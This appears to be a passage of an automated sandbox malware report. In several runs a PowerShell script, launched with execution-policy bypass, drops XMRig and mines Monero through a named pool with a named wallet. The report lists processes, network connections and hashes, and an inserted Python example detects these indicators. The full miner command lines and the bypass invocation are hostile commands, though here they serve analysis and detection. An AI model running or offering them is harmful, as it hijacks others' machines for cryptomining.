| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3424 wrote to memory of 4916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3424 wrote to memory of 4916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.239.69.13.in-addr.arpa | udp |
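The Processes and Network rows above carry the whole chain a detection needs: PowerShell started with -ExecutionPolicy bypass on a script in the user's Temp, which launches the dropped xmrig.exe with -a rx, a stratum+ssl pool on port 443 and a Monero wallet in -u, followed by a TLS connection to rx.unmineable.com. The Python below is an added triage example, not code from this report or from any sandbox: it scores constructed Sysmon-style process and network events that mirror the behavioral19 rows (PIDs 3424 and 4916), extracts pool, port, algorithm and wallet from the miner command line, and flags a PID once it accumulates two independent signals. The event classes, the MINER_ALGOS shortlist and the two-signal threshold are assumptions for illustration; the SHA256, pool host and pool IP are copied from the report.

```python
# Added triage example (not from the report): score process and network events
# against XMRig indicators. Sample events are constructed to mirror behavioral19.
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

DROPPED_XMRIG_SHA256 = "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"  # from report
POOL_HOSTS, POOL_IPS = {"rx.unmineable.com"}, {"161.35.34.195"}                          # from report

# Monero primary addresses: 95 base58 chars starting with '4' (subaddresses '8'); base58 has no 0, O, I, l.
XMR_ADDR = re.compile(r"(?<![1-9A-HJ-NP-Za-km-z])[48][1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-HJ-NP-Za-km-z])")
STRATUM_URI = re.compile(r"stratum\+(ssl|tls|tcp)://([A-Za-z0-9.-]+):(\d{1,5})", re.I)
PS_BYPASS = re.compile(r"-e\w*\s+bypass", re.I)   # -ExecutionPolicy / -ep / -ex bypass
MINER_ALGOS = {"rx", "rx/0", "randomx", "cn", "cn/r", "kawpow", "ghostrider"}  # assumed shortlist

@dataclass
class ProcessEvent:   # assumed shape, roughly Sysmon event 1
    pid: int
    image: str
    cmdline: str
    parent_image: str = ""
    parent_cmdline: str = ""
    sha256: str = ""

@dataclass
class NetworkEvent:   # assumed shape, roughly Sysmon event 3 plus the resolved name
    pid: int
    dest_ip: str
    dest_port: int
    dest_host: str = ""

def parse_cli(cmdline):
    """Split a Windows command line into (image, {flag: value}); quoted paths stay whole."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    opts, i = {}, 1
    while i < len(toks):
        t, nxt = toks[i], (toks[i + 1] if i + 1 < len(toks) else "-")
        if "=" in t:                                   # --url=stratum+...
            k, v = t.lstrip("-").split("=", 1)
        elif not nxt.startswith("-"):                  # -a rx
            k, v, i = t.lstrip("-"), nxt, i + 1
        else:                                          # bare switch such as --background
            k, v = t.lstrip("-"), True
        opts[k], i = v, i + 1
    return (toks[0] if toks else ""), opts

def assess_process(ev):
    """Return (findings, context) for one process-creation event."""
    findings, ctx = [], {}
    name = PureWindowsPath(ev.image).name.lower()
    _, opts = parse_cli(ev.cmdline)
    if name == "xmrig.exe" or ev.sha256.lower() == DROPPED_XMRIG_SHA256:
        findings.append("known XMRig binary")
    if name in ("powershell.exe", "pwsh.exe") and PS_BYPASS.search(ev.cmdline):
        findings.append("PowerShell with -ExecutionPolicy bypass")
    m = STRATUM_URI.search(ev.cmdline)
    if m:
        scheme, host, port = m.group(1).lower(), m.group(2).lower(), int(m.group(3))
        ctx.update(pool_host=host, pool_port=port)
        findings.append(f"stratum pool {host}:{port}")
        if scheme in ("ssl", "tls") and port == 443:
            findings.append("stratum over TLS on 443 (looks like HTTPS in flow logs)")
    w = XMR_ADDR.search(ev.cmdline)
    if w:
        ctx["wallet"] = w.group(0)
        findings.append("Monero wallet address in command line")
    algo = opts.get("a") or opts.get("algo")
    if isinstance(algo, str) and algo.lower() in MINER_ALGOS:
        findings.append(f"miner algorithm flag -a {algo}")
    if "powershell" in ev.parent_image.lower() and PS_BYPASS.search(ev.parent_cmdline):
        findings.append("parent is PowerShell with -ExecutionPolicy bypass")
    return findings, ctx

def assess_network(ev):
    """One finding if the destination is a known pool host or IP."""
    if ev.dest_host.lower() in POOL_HOSTS or ev.dest_ip in POOL_IPS:
        return [f"connection to mining pool {ev.dest_host or ev.dest_ip}:{ev.dest_port}"]
    return []

def verdict(process_events, network_events, threshold=2):
    """Flag PIDs with >= threshold signals (assumed value) so a lone '-ExecutionPolicy bypass' does not fire."""
    per_pid = {}
    for p in process_events:
        f, ctx = assess_process(p)
        entry = per_pid.setdefault(p.pid, {"findings": [], "context": {}})
        entry["findings"] += f
        entry["context"].update(ctx)
    for n in network_events:
        per_pid.setdefault(n.pid, {"findings": [], "context": {}})["findings"] += assess_network(n)
    return {pid: e for pid, e in per_pid.items() if len(e["findings"]) >= threshold}

# Constructed events mirroring the Processes and Network rows above (PID 3424 spawns 4916).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
XMRIG_IMAGE = r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe"
PS_CMD = r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"'
XMRIG_CMD = (f'"{XMRIG_IMAGE}" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:'
             "45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
             ".unmineable_worker_vilqtiac -p x")
SAMPLE_PROCESSES = [ProcessEvent(3424, PS_IMAGE, PS_CMD),
                    ProcessEvent(4916, XMRIG_IMAGE, XMRIG_CMD, PS_IMAGE, PS_CMD, DROPPED_XMRIG_SHA256)]
SAMPLE_NETWORK = [NetworkEvent(3424, "185.199.108.133", 443, "objects.githubusercontent.com"),
                  NetworkEvent(4916, "161.35.34.195", 443, "rx.unmineable.com")]
```

Running verdict(SAMPLE_PROCESSES, SAMPLE_NETWORK) flags only PID 4916; the PowerShell parent alone stays under the threshold, which is deliberate, since -ExecutionPolicy bypass on its own is common in administrative scripts. Two points worth keeping in mind when turning this into a production rule: the pool traffic is TLS to port 443, so flow logs will not distinguish it from HTTPS and the DNS query for rx.unmineable.com and the process command line are the reliable signals; and the SeLockMemoryPrivilege rows in the report are XMRig asking for large pages for RandomX, so that privilege being enabled by an unsigned binary under a user's Temp is a usable secondary signal. The __PSScriptPolicyTest_*.ps1 files listed under Files are PowerShell's own execution-policy probe, which is why they hash identically in every run; they are not payloads dropped by the script.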
Files
memory/3424-0-0x00007FF8E4853000-0x00007FF8E4855000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3i4xyta1.gor.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3424-10-0x000001CF68720000-0x000001CF68742000-memory.dmp
memory/3424-11-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-12-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-14-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-15-0x000001CF687B0000-0x000001CF687C2000-memory.dmp
memory/3424-16-0x000001CF687A0000-0x000001CF687AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4916-47-0x00000133268C0000-0x00000133268E0000-memory.dmp
memory/4916-48-0x00000133280C0000-0x00000133280E0000-memory.dmp
memory/4916-49-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-50-0x00000133280E0000-0x0000013328100000-memory.dmp
memory/4916-51-0x0000013328100000-0x0000013328120000-memory.dmp
memory/4916-52-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/3424-54-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-53-0x00007FF8E4853000-0x00007FF8E4855000-memory.dmp
memory/3424-56-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/4916-55-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-57-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-58-0x00000133280E0000-0x0000013328100000-memory.dmp
memory/4916-59-0x0000013328100000-0x0000013328120000-memory.dmp
memory/4916-60-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-61-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-62-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-63-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-64-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-65-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-66-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-67-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-68-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-69-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-70-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-71-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-72-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-73-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-74-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-75-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-76-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-77-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-78-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-79-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-80-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-81-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-82-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-83-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-84-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-85-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-86-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-87-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-88-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-89-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-90-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-91-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-92-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-93-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-94-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-95-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-96-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-97-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-98-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-99-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-100-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-101-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-102-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-103-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-104-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-105-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-106-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-107-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-108-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-109-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-110-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-111-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-112-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-113-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-114-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-115-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-116-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-117-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-118-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:53
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3288 wrote to memory of 4824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3288 wrote to memory of 4824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3288-0-0x00007FFAC0893000-0x00007FFAC0895000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j5ac50dy.miv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3288-9-0x00000153A0100000-0x00000153A0122000-memory.dmp
memory/3288-10-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/3288-11-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/3288-12-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/3288-14-0x00000153A01A0000-0x00000153A01B2000-memory.dmp
memory/3288-15-0x00000153A0190000-0x00000153A019A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4824-46-0x000001814CE50000-0x000001814CE70000-memory.dmp
memory/4824-47-0x000001814E870000-0x000001814E890000-memory.dmp
memory/4824-48-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/3288-49-0x00007FFAC0893000-0x00007FFAC0895000-memory.dmp
memory/3288-50-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/4824-52-0x000001814E8B0000-0x000001814E8D0000-memory.dmp
memory/4824-51-0x000001814E890000-0x000001814E8B0000-memory.dmp
memory/4824-53-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-54-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-55-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-57-0x000001814E8B0000-0x000001814E8D0000-memory.dmp
memory/4824-56-0x000001814E890000-0x000001814E8B0000-memory.dmp
memory/4824-58-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-59-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-60-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-61-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-62-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-63-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-64-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-65-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-66-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-67-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-68-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-69-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-70-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-71-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-72-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-73-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-74-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-75-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-76-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-77-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-78-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-79-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-80-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-81-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-82-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-83-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-84-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-85-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-86-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-87-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-88-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-89-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-90-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-91-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-92-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-93-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-94-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-95-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-96-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-97-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-98-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-99-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-100-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-101-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-102-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-103-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-104-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-105-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-106-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-107-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-108-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-109-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-110-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-111-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-112-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-113-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-114-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-115-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-116-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:58
Platform
win11-20240426-en
Max time kernel
1788s
Max time network
1762s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4160 wrote to memory of 3936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4160 wrote to memory of 3936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.11:443 | | tcp |
Files
memory/4160-0-0x00007FFA68473000-0x00007FFA68475000-memory.dmp
